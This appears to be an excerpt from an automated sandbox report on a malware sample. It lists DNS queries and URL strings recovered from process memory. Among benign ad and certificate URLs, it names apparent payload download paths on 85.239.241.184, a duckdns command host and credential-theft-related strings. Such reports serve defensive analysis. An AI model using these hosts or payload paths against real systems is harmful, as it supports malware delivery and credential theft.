                    Source: RegAsm.exe, 0000000D.00000002.405144443.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: ~@:9@0123456789ABCDEFURL index.datvisited:https://www.google.com/accounts/serviceloginhttp://www.facebook.com/https://login.yahoo.com/config/login$ equals www.yahoo.com (Yahoo)
                    Source: global trafficDNS traffic detected: DNS query: zeep.ly
                    Source: global trafficDNS traffic detected: DNS query: ia601706.us.archive.org
                    Source: global trafficDNS traffic detected: DNS query: dremom2.duckdns.org
                    Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                    Source: powershell.exe, 0000000B.00000002.393985624.00000000024CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.239.241.184
                    Source: powershell.exe, 0000000B.00000002.393985624.00000000024CA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://85.239.241.184/50/RMHC.txt
                    Source: EQNEDT32.EXE, 00000007.00000002.379983063.00000000005AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.239.241.184/50/fastgeecleancheckupnewthinkstobegetme.tIF
                    Source: EQNEDT32.EXE, 00000007.00000002.379983063.00000000005AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.239.241.184/50/fastgeecleancheckupnewthinkstobegetme.tIFj
                    Source: EQNEDT32.EXE, 00000007.00000002.379983063.00000000005AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://85.239.241.184/50/fastgeecleancheckupnewthinkstobegetme.tIFm
                    Source: gvt on 85.239.241.184.url.0.drString found in binary or memory: http://85.239.241.184/50/gvt/
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://acdn.adnxs.com/ast/ast.js
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://b.scorecardresearch.com/beacon.js
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://cache.btrll.com/default/Pix-1x1.gif
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://cdn.at.atwola.com/_media/uac/msn.html
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://cdn.taboola.com/libtrc/msn-home-network/loader.js
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png
                    Source: powershell.exe, 0000000B.00000002.396943694.00000000051C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                    Source: powershell.exe, 0000000B.00000002.396943694.00000000051C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
                    Source: powershell.exe, 0000000B.00000002.396943694.00000000051C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                    Source: powershell.exe, 0000000B.00000002.396943694.00000000051C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
                    Source: powershell.exe, 0000000B.00000002.396943694.00000000051C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                    Source: powershell.exe, 0000000B.00000002.396943694.00000000051C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
                    Source: powershell.exe, 0000000B.00000002.396943694.00000000051C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://csp.yahoo.com/beacon/csp?src=yahoocom-expect-ct-report-only
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset
                    Source: RegAsm.exe, RegAsm.exe, 0000000C.00000002.911284833.00000000006D5000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.911284833.0000000000709000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
                    Source: RegAsm.exe, 0000000C.00000002.911284833.00000000006D5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp%A
                    Source: powershell.exe, 0000000B.00000002.394834348.0000000003EA9000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000C.00000002.911066076.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                    Source: powershell.exe, 0000000B.00000002.393985624.0000000002AFD000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
                    Source: powershell.exe, 0000000B.00000002.393589357.000000000019A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoft.c
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA2oHEB?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42Hq5?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42eYr?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA42pjY?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA6K5wX?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA6pevu?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA8I0Dg?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AA8uJZv?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAHxwMU?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAJhH73?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAgi0nZ?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAhvyvD?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtB8UA?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtBduP?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtBnuN?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jp
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCLD9?h=368&w=522&m=6&q=60&u=t&o=t&l=f&f=jp
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCr7K?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCzBA?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jp
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyXtPP?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzl6aj?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17cJeH?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dAYk?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dJEo?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dLTg?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dOHE?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dWNo?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dtuY?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e0XT?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e3cA?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e5NB?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e7Ai?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e9Q0?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17eeI9?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17ejTJ?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBYMDHp?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBZbaoj?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBh7lZF?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jp
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBih5H?m=6&o=true&u=true&n=true&w=30&h=30
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBlKGpe?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBlPHfm?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBnMzWD?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqRcpR?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                    Source: powershell.exe, 0000000B.00000002.394834348.0000000003299000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://o.aolcdn.com/ads/adswrappermsni.js
                    Source: powershell.exe, 0000000B.00000002.396943694.00000000051C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                    Source: powershell.exe, 0000000B.00000002.396943694.00000000051C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                    Source: powershell.exe, 0000000B.00000002.396943694.00000000051C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                    Source: powershell.exe, 0000000B.00000002.396943694.00000000051C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                    Source: powershell.exe, 0000000B.00000002.396943694.00000000051C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                    Source: powershell.exe, 0000000B.00000002.396943694.00000000051C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                    Source: powershell.exe, 0000000B.00000002.396943694.00000000051C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683
                    Source: powershell.exe, 00000009.00000002.398949438.0000000002391000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.393985624.0000000002271000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/_h/975a7d20/webcore/externalscripts/jquery/jquer
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/css/f15f847b-3b9d03a9/directi
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/js/f15f847b-7e75174a/directio
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/js/f15f847b-80c466c0/directio
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/6b/7fe9d7.woff
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/c6/cfdbd9.png
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/64bfc5b6/webcore/externalscripts/oneTrust/de-
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquer
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/a1438951/webcore/externalscripts/oneTrust/ski
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/css/f60532dd-8d94f807/directi
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/js/f60532dd-2923b6c2/directio
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/js/f60532dd-a12f0134/directio
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/21/241a2c.woff
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA2oHEB.img?h=16&w=16&m
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42Hq5.img?h=16&w=16&m
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42eYr.img?h=16&w=16&m
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42pjY.img?h=16&w=16&m
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA6K5wX.img?h=16&w=16&m
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA6pevu.img?h=16&w=16&m
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA8I0Dg.img?h=16&w=16&m
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA8uJZv.img?h=16&w=16&m
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAHxwMU.img?h=16&w=16&m
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAJhH73.img?h=16&w=16&m
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAgi0nZ.img?h=16&w=16&m
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAhvyvD.img?h=16&w=16&m
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtB8UA.img?h=166&w=310
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtBduP.img?h=75&w=100&
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtBnuN.img?h=166&w=310
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCLD9.img?h=368&w=522
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCr7K.img?h=75&w=100&
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCzBA.img?h=250&w=300
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyXtPP.img?h=16&w=16&m
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzl6aj.img?h=16&w=16&m
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17cJeH.img?h=250&w=30
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dAYk.img?h=75&w=100
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dJEo.img?h=75&w=100
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dLTg.img?h=166&w=31
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dOHE.img?h=333&w=31
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dWNo.img?h=166&w=31
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dtuY.img?h=333&w=31
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e0XT.img?h=166&w=31
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e3cA.img?h=75&w=100
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e5NB.img?h=75&w=100
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e7Ai.img?h=250&w=30
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e9Q0.img?h=166&w=31
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17eeI9.img?h=75&w=100
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17ejTJ.img?h=75&w=100
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBYMDHp.img?h=27&w=27&m
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBZbaoj.img?h=16&w=16&m
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBh7lZF.img?h=333&w=311
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBih5H.img?m=6&o=true&u
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlKGpe.img?h=75&w=100&
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlPHfm.img?h=16&w=16&m
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnMzWD.img?h=16&w=16&m
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBqRcpR.img?h=16&w=16&m
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://static.chartbeat.com/js/chartbeat.js
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js
                    Source: powershell.exe, 0000000B.00000002.396943694.00000000051C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                    Source: powershell.exe, 0000000B.00000002.396943694.00000000051C1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                    Source: RegAsm.exe, RegAsm.exe, 0000000F.00000002.402455012.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                    Source: RegAsm.exe, RegAsm.exe, 0000000F.00000002.402455012.0000000000400000.00000040.80000000.00040000.00000000.sdmp, RegAsm.exe, 0000000F.00000002.402847850.0000000001D59000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                    Source: RegAsm.exe, 0000000F.00000002.402305414.000000000028C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com/JK
                    Source: RegAsm.exe, 0000000F.00000002.402455012.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                    Source: RegAsm.exe, 0000000F.00000002.402455012.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://www.msn.com/
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://www.msn.com/?ocid=iehp
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://www.msn.com/advertisement.ad.js
                    Source: bhv71A7.tmp.13.drString found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
                    Source: RegAsm.exe, 0000000D.00000002.405011674.0000000000184000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
                    Source: RegAsm.exe, 0000000F.00000002.402455012.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                    Source: rXgoN.url.0.drString found in binary or memory: http://zeep.ly/rXgoN
                    Source: bhv71A7.tmp.13.drString found in binary or memory: https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
                    Source: bhv71A7.tmp.13.drString found in binary or memory: https://contextual.media.net/
                    Source: bhv71A7.tmp.13.drString found in binary or memory: https://contextual.media.net/8/nrrV73987.js
                    Source: bhv71A7.tmp.13.drString found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3
                    Source: bhv71A7.tmp.13.drString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
                    Source: bhv71A7.tmp.13.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
                    Source: powershell.exe, 0000000B.00000002.394834348.0000000003299000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 0000000B.00000002.394834348.0000000003299000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 0000000B.00000002.394834348.0000000003299000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: bhv71A7.tmp.13.drString found in binary or memory: https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9
